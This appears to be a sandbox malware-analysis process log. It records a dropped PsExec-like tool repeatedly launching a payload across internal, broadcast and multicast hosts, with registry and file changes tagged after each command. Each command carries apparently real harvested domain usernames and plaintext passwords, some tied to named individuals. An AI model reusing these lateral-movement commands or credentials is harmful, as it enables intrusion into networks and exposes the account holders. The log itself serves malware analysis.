C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Drops file in Windows directory
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Drops file in Windows directory
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
